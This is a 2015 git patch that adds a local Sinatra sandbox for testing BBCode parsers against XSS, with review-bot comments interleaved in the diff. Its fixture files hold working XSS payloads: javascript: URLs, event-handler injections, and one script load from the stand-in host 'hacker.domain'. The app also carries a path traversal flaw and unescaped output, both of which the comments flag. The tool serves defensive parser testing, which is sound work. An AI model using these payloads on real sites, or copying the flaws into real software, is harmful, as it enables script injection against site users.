From c67e390c31cabfb76fdda8dd37e130eb36702bea Mon Sep 17 00:00:00 2001
From: Jordan Orelli
Date: Tue, 3 Nov 2015 18:15:25 -0500
Subject: [PATCH] bbcode exploit tester

---
Gemfile | 7 +++
bbsandbox.rb | 85 +++++++++++++++++++++++++++++
posts/color-tag-extension-injection | 2 +
posts/color-tag-injection | 1 +
posts/font-tag-injection | 1 +
posts/img-tag-injection | 2 +
posts/nested-image-tag-injection | 2 +
posts/nested-url-tag-injection | 2 +
posts/table-tag-injection | 2 +
posts/url-js-injection | 1 +
posts/url-tag-injection | 1 +
posts/youtube-js-injection | 1 +
posts/youtube-to-url-js-injection | 1 +
public/alert.js | 2 +
views/index.slim | 21 +++++++
views/input.slim | 16 ++++++
views/output.slim | 13 +++++
17 files changed, 160 insertions(+)
create mode 100644 Gemfile
create mode 100644 bbsandbox.rb
create mode 100644 posts/color-tag-extension-injection
create mode 100644 posts/color-tag-injection
create mode 100644 posts/font-tag-injection
create mode 100644 posts/img-tag-injection
create mode 100644 posts/nested-image-tag-injection
create mode 100644 posts/nested-url-tag-injection
create mode 100644 posts/table-tag-injection
create mode 100644 posts/url-js-injection
create mode 100644 posts/url-tag-injection
create mode 100644 posts/youtube-js-injection
create mode 100644 posts/youtube-to-url-js-injection
create mode 100644 public/alert.js
create mode 100644 views/index.slim
create mode 100644 views/input.slim
create mode 100644 views/output.slim

diff --git a/Gemfile b/Gemfile
new file mode 100644
index 0000000..298ba7d
--- /dev/null
+++ b/Gemfile
@@ -0,0 +1,7 @@
+source "http://rubygems.org"
+
+gem "sinatra"
+gem "thin"
+gem "slim"
+gem "bb-ruby"
+gem "ruby-bbcode"
diff --git a/bbsandbox.rb b/bbsandbox.rb
new file mode 100644
index 0000000..f1cdcbe
--- /dev/null
+++ b/bbsandbox.rb
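Review bot: `source "http://rubygems.org"` on the first line of the Gemfile fetches every gem over plain HTTP, so anyone on the path can substitute gem contents at install time; that is the supply-chain entry point for the whole sandbox and Bundler itself warns about an insecure source. Change it to `source "https://rubygems.org"`. The gems are also unpinned and no Gemfile.lock is part of this commit, so the resolved versions of bb-ruby and ruby-bbcode — the parsers this tool exists to probe — are not recorded anywhere; commit the lockfile or pin the two parser gems so a finding can be tied to a specific version.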
@@ -0,0 +1,85 @@
+require 'sinatra'
+require 'slim'
+require 'digest/sha1'
+require 'bb-ruby'
+require 'ruby-bbcode'
+
+@@engines = ['bb-ruby', 'ruby-bbcode', 'raw']
+
+get '/' do
+ @posts = list_posts
+ @engines = @@engines
+ slim :index
+end
+
+def show_create_page(engine)
+ get "/#{engine}" do
+ slim :input
+ end
+end
+
+def get_post(engine)
+ get "/#{engine}/:slug" do
+ body = read_post params[:slug]
+ @engine = 'bb-ruby'
+ @slug = params[:slug]
+ @other_engines = @@engines.select{|e| e != engine}
+ @bbcode_output = exec_bbcode engine, body
+ slim :output
+ end
+end
+
+def exec_bbcode(engine, body)
+ case engine
+ when "bb-ruby"
+ BBRuby.to_html body
+ when "ruby-bbcode"
+ RubyBBCode.to_html body
+ when "raw"
+ body
+ else
+ raise "unknown engine: #{engine}"
+ end
+end
+
+def create_post(engine)
+ post "/#{engine}" do
+ slug = store_post request
+ redirect to("#{engine}/#{slug}")
+ end
+end
+
+def setup_dir
+ begin
+ Dir.mkdir "posts"
+ rescue
+ end
+end
+
+def slugify(title)
+ title.downcase.strip.split(" ").join('-')
+end
+
+def store_post(request)
+ setup_dir
+ title = slugify(request["slug"])
+ comment = request["comment"]
+ File.write "posts/#{title}", comment
+ title
+end
+
+def read_post(slug)
+ file = File.open("posts/#{slug}", "r")
+ file.read
+end
+
+def list_posts
+ Dir.entries("posts").select{|entry| entry != '.' && entry != '..'}
+end
+
+@@engines.each do |engine|
+ show_create_page engine
+ get_post engine
+ create_post engine
+end
+
diff --git a/posts/color-tag-extension-injection b/posts/color-tag-extension-injection
new file mode 100644
index 0000000..0c0d29f
--- /dev/null
+++ b/posts/color-tag-extension-injection
@@ -0,0 +1,2 @@
+[color=#ff0000;xss:expression(alert(String.fromCharCode(88,83,83)));]XSS[/color]
+
diff --git a/posts/color-tag-injection b/posts/color-tag-injection
new file mode 100644
index 0000000..7fb6011
--- /dev/null
+++ b/posts/color-tag-injection
@@ -0,0 +1 @@
+[color=#ff0000;font-size:100px;]XSS[/color]
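Review bot: `store_post` and `read_post` interpolate a caller-supplied slug straight into a filesystem path (`File.write "posts/#{title}", comment` and `File.open("posts/#{slug}", "r")`), and `slugify` only turns spaces into hyphens, so a POST with `slug=../../x` writes attacker-controlled content outside `posts/`; Sinatra's `:slug` capture normally will not match a literal `/`, but I would not lean on that for the read side either. Route both through one helper that accepts only what `slugify` is meant to produce, as below, and let it use `File.read` so the handle that `read_post` currently opens and never closes goes away. Separately, `@engine = 'bb-ruby'` in `get_post` should be `@engine = engine`, otherwise the "try again" link that output.slim builds from `@engine` always points at /bb-ruby whichever engine was viewed. The top-level `@@engines` is a class-variable access from toplevel, a warning on Ruby of this commit's era and a RuntimeError on Ruby 3.0+; a constant such as `ENGINES = %w[bb-ruby ruby-bbcode raw].freeze` (and the two views updated to match) avoids both.
```ruby
# Only a name slugify is meant to produce may reach the filesystem:
# this rejects "", "..", "/" and encoded separators before any path is built.
SLUG_RE = /\A[a-z0-9][a-z0-9-]*\z/

def post_path(slug)
  halt 400, "bad slug" unless slug.is_a?(String) && slug =~ SLUG_RE
  File.join("posts", slug)
end

# … unchanged: setup_dir, slugify …

def store_post(request)
  setup_dir
  title = slugify(request["slug"])
  File.write post_path(title), request["comment"]
  title
end

def read_post(slug)
  File.read(post_path(slug))   # closes the handle, unlike a bare File.open
end
```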
diff --git a/posts/font-tag-injection b/posts/font-tag-injection
new file mode 100644
index 0000000..cadbd4a
--- /dev/null
+++ b/posts/font-tag-injection
@@ -0,0 +1 @@
+[font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
diff --git a/posts/img-tag-injection b/posts/img-tag-injection
new file mode 100644
index 0000000..5283f5f
--- /dev/null
+++ b/posts/img-tag-injection
@@ -0,0 +1,2 @@
+[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
+
diff --git a/posts/nested-image-tag-injection b/posts/nested-image-tag-injection
new file mode 100644
index 0000000..2c622b6
--- /dev/null
+++ b/posts/nested-image-tag-injection
@@ -0,0 +1,2 @@
+[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
+
diff --git a/posts/nested-url-tag-injection b/posts/nested-url-tag-injection
new file mode 100644
index 0000000..bf35581
--- /dev/null
+++ b/posts/nested-url-tag-injection
@@ -0,0 +1,2 @@
+[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
+
diff --git a/posts/table-tag-injection b/posts/table-tag-injection
new file mode 100644
index 0000000..385235d
--- /dev/null
+++ b/posts/table-tag-injection
@@ -0,0 +1,2 @@
+[table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onmouseover='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
+
diff --git a/posts/url-js-injection b/posts/url-js-injection
new file mode 100644
index 0000000..e52a414
--- /dev/null
+++ b/posts/url-js-injection
@@ -0,0 +1 @@
+[url=javascript:t=document.createElement('script');t.src='/alert.js';document.body.appendChild(t);//]test[/url]
diff --git a/posts/url-tag-injection b/posts/url-tag-injection
new file mode 100644
index 0000000..d47d154
--- /dev/null
+++ b/posts/url-tag-injection
@@ -0,0 +1 @@
+[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
diff --git a/posts/youtube-js-injection b/posts/youtube-js-injection
new file mode 100644
index 0000000..8de29ff
--- /dev/null
+++ b/posts/youtube-js-injection
@@ -0,0 +1 @@
+[youtube=javascript:t=document.createElement('script');t.src='alert.js';document.body.appendChild(t);//]test[/youtube]
\ No newline at end of file
diff --git a/posts/youtube-to-url-js-injection b/posts/youtube-to-url-js-injection
new file mode 100644
index 0000000..2228165
--- /dev/null
+++ b/posts/youtube-to-url-js-injection
@@ -0,0 +1 @@
+[youtube=javascript:t=document.createElement('script');t.src='//hacker.domain/script.js';document.body.appendChild(t);//]test[/url]
\ No newline at end of file
diff --git a/public/alert.js b/public/alert.js
new file mode 100644
index 0000000..34f4296
--- /dev/null
+++ b/public/alert.js
@@ -0,0 +1,2 @@
+alert("This is an alert. You've been XSSed.");
+
diff --git a/views/index.slim b/views/index.slim
new file mode 100644
index 0000000..1ae5845
--- /dev/null
+++ b/views/index.slim
@@ -0,0 +1,21 @@
+doctype html
+html
+ head
+ title pick an engine
+ body
+ #content
+ h1 create a sploit
+ ul
+ - @@engines.each do |engine|
+ li
+ a href="#{engine}" = engine
+ #existing
+ h1 list sploits
+ table
+ - @posts.each do |post|
+ tr
+ td = post
+ - @@engines.each do |engine|
+ td
+ a href="#{engine}/#{post}" view in #{engine}
+
diff --git a/views/input.slim b/views/input.slim
new file mode 100644
index 0000000..d804125
--- /dev/null
+++ b/views/input.slim
@@ -0,0 +1,16 @@
+doctype html
+html
+ head
+ title pwn
+ body
+ h1 add your dope sploit
+ form method='post' name='sploit'
+ label for='slug' slug
+ br
+ input name='slug' type='text'
+ br
+ label for='comment' bbcode input
+ br
+ textarea name='comment' rows=10 cols=80
+ br
+ input type='submit'
diff --git a/views/output.slim b/views/output.slim
new file mode 100644
index 0000000..a0e7628
--- /dev/null
+++ b/views/output.slim
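Review bot: The youtube-to-url fixture sets `t.src='//hacker.domain/script.js'`, a host nobody in this project controls, so whenever the payload actually fires in the tester's browser it executes whatever that domain's current owner chooses to serve; every other fixture points at the local `/alert.js`, and this one should too, `t.src='/alert.js'`. The mismatched close tag (`[youtube=...]test[/url]`) looks deliberate given the file name, but a data file has nowhere to say so — a line in a README listing each fixture's intent would spare the next reader from "fixing" it.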
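Review bot: index.slim reaches for the class variable `@@engines` in both loops even though the `/` route already assigns `@engines = @@engines` for this very template, so the instance variable is set and never read. Use what the route hands the view, `- @engines.each do |engine|` in both places, which keeps the template independent of how the engine list is stored and drops the class-variable lookup from template scope. The hrefs here are relative (`a href="#{engine}/#{post}"`) while output.slim builds absolute ones (`/#{engine}/#{@slug}`); this works from `/` but picking one convention avoids surprises if the index is ever served from another path.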
@@ -0,0 +1,13 @@
+doctype html
+html
+ head
+ title output
+ body
+ #content
+ == @bbcode_output
+ ul
+ li
+ a href="/#{@engine}" try again
+ - @other_engines.each do |engine|
+ li
+ a href="/#{engine}/#{@slug}" view in #{engine}
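Review bot: `== @bbcode_output` emits the engine's HTML unescaped — and for the `raw` engine that is the stored post verbatim — which is the whole point of this sandbox but reads like an oversight to anyone who lands on the line without context. Put a Slim comment directly above it saying so, `/ == (unescaped) is deliberate: the page exists to show exactly what the bbcode engine emits`, and mention in the same comment that this is why the app must only ever run as a throwaway local instance. The "try again" link depends on `@engine`, which the route in bbsandbox.rb currently hardcodes rather than deriving from the engine viewed, so that link is only right for bb-ruby until that is fixed on the Ruby side.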